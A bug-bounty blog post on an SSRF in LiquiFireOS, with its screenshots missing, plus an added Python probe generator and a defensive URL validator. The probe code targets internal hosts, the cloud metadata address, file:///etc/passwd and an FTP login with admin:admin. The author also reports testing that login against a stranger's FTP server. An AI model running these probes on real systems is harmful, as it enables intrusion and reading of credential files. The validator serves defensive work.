Saturday, 28 December 2019

Testing SSRF in LiquiFireOS

During one bug bounty I found that the target web app was returning some 'interesting errors' in its responses. ;) As that is always a nice hint to see during pentests or CTFs, I decided to dig a little deeper. Below you will find the details of an SSRF I found in LiquiFireOS. Here we go...

Today we'll start here:

This solution was 'something new' for me. Example response I found online during the bug bounty:
I decided to use Burp Suite and try a few of the scenarios described in one of the posts on this blog:

A few more cases (and a sample response):

So it looks like we're talking about version 4.8.0 :) Cool, next:

As you can see (example requests from Intruder), there is an interesting part of the link, for example url.
I decided to check some other 'url' :) Results below:

That looks interesting ;> So what is the problem? Maybe the port? Maybe the hostname? I'll try changing both of them:

That's nice :) Is there any other parameter available for this kind of modification?

To verify it, I decided to read a very nice book over Christmas, called the manual: ;)

You can find a few more cool cases and examples there.

As I saw in one of the error messages, only four URL schemes are accepted: http://, ftp://, file:// and cms://. I decided to try http and ftp:

Nice response. ;)

I decided to check whether the target app could do something else for me, for example log in to some (internal? ;)) FTP server. Because I don't have one (in the 'target/bug bounty company' ;)), I decided to use a nice-for-cats FTP server I found online. Let's try to log in with admin:admin credentials:

Looks promising ;)
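To make the sweep above repeatable, here is an added example (my own, not code from the post or from LiquiFireOS) of how I would generate the probe set and triage the responses. It assumes a hypothetical GET parameter named url on a hypothetical endpoint https://target.example/render, and the internal hosts and ports are constructed; the real parameter name and error strings are only visible in the screenshots. It goes a little beyond the post by including a file:// probe, since the error message lists that scheme too.

```python
"""SSRF probe generation and differential triage for a URL-fetching parameter.

Added example, not code from the original post or from LiquiFireOS.
Assumptions (not in the post): the parameter is called `url`, the endpoint
is https://target.example/render, and the internal hosts/ports are made up.
"""
from urllib.parse import quote, urlencode

# Schemes the post reports the application accepts (from its error message).
ALLOWED_SCHEMES = ("http", "ftp", "file", "cms")

# Constructed targets: loopback, cloud metadata address, an RFC 1918 host.
INTERNAL_HOSTS = ("127.0.0.1", "169.254.169.254", "10.0.0.1")
PORTS = (21, 22, 80, 443, 8080)


def build_probe(scheme, host, port=None, path="/", user=None, password=None):
    """Return the URL the vulnerable fetcher will be asked to retrieve."""
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {scheme!r} is not in the reported allowlist")
    netloc = host
    if user is not None:
        # ftp://user:pass@host makes the application log in on our behalf.
        cred = quote(user, safe="")
        if password is not None:
            cred += ":" + quote(password, safe="")
        netloc = f"{cred}@{netloc}"
    if port is not None:
        netloc = f"{netloc}:{port}"
    return f"{scheme}://{netloc}{path}"


def probe_set(param="url", base="https://target.example/render"):
    """Yield (label, full request URL) pairs for an Intruder-style sweep."""
    for scheme in ("http", "ftp"):
        for host in INTERNAL_HOSTS:
            for port in PORTS:
                target = build_probe(scheme, host, port)
                yield f"{scheme}:{host}:{port}", f"{base}?{urlencode({param: target})}"
    # Beyond the post: file:// is in the allowlist too, so try a local read,
    # and one ftp:// probe with embedded credentials against an internal host.
    yield "file:/etc/passwd", f"{base}?{urlencode({param: build_probe('file', '', path='/etc/passwd')})}"
    yield "ftp:creds", f"{base}?{urlencode({param: build_probe('ftp', '10.0.0.1', 21, user='admin', password='admin')})}"


def classify(baseline, response, tolerance=0.05, slow_after=2.0):
    """Triage one probe against a baseline taken with a known-closed port.

    Both arguments are dicts with 'status', 'length' and 'elapsed' (seconds).
    A different status or body means the fetcher got something back; a much
    slower answer with the same error usually means a filtered port or a
    host that is up but not answering, which is itself information.
    """
    if response["status"] != baseline["status"]:
        return "different-status"
    if abs(response["length"] - baseline["length"]) > tolerance * baseline["length"]:
        return "different-body"
    if response["elapsed"] > max(slow_after, 3 * baseline["elapsed"]):
        return "slow"
    return "same-as-baseline"


if __name__ == "__main__":
    for label, request_url in probe_set():
        print(f"{label:28} {request_url}")
```

A closed port usually comes back as a fast error and a filtered one as a timeout, so the elapsed time is as telling as the body. Point ftp:// credentials only at a host you control: a third-party FTP server sees the login the application performs on your behalf, and so does anyone watching that server.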

If you look at the main page ('of the target') you should see something like this:

Sample payload to use in your URL:

Maybe you'll find it useful.
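For the other side of the report, an added example (again my own, not LiquiFireOS code) of the check a server-side fetcher should make before retrieving a user-supplied URL: allow only http and https, refuse embedded credentials and unusual ports, and reject any name that resolves to a non-public address. The resolver is injectable so the check can run offline; the host table used to exercise it is constructed.

```python
"""Server-side validation for a user-supplied fetch URL.

Added example, not code from the original post or from LiquiFireOS. The
resolver is injectable so the check can be exercised offline with a
constructed host table instead of live DNS.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}


def resolve_all(host):
    """Every address a name resolves to; one bad address is enough to reject."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_safe_fetch_url(url, resolve=resolve_all):
    """Return (ok, reason). Accept only public http(s) targets."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"          # ftp://, file://, cms://, ...
    if not parts.hostname:
        return False, "no host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"          # ftp://admin:admin@host style
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    try:
        addrs = resolve(parts.hostname)
    except OSError:
        return False, "unresolvable"
    if not addrs:
        return False, "unresolvable"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        # is_global is False for loopback, RFC 1918, link-local (including the
        # 169.254.169.254 metadata address), CGNAT, multicast and reserved space.
        if not ip.is_global:
            return False, f"{addr} is not public"
    return True, "ok"


if __name__ == "__main__":
    # Constructed table standing in for DNS, so the demo runs offline.
    table = {"example.com": {"93.184.216.34"}, "internal.corp": {"10.0.0.5"}}
    for candidate in ("https://example.com/a.png", "ftp://admin:admin@10.0.0.1/",
                      "http://internal.corp/", "http://169.254.169.254/"):
        print(candidate, is_safe_fetch_url(candidate, resolve=lambda h: table.get(h, set())))
```

Two caveats that matter in practice: the fetcher must connect to the address it just validated (not resolve the name a second time), or the check is defeated by DNS rebinding; and it must not follow redirects, since a public host can answer 302 to an internal URL and the fetcher would happily go there.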

See you next time!

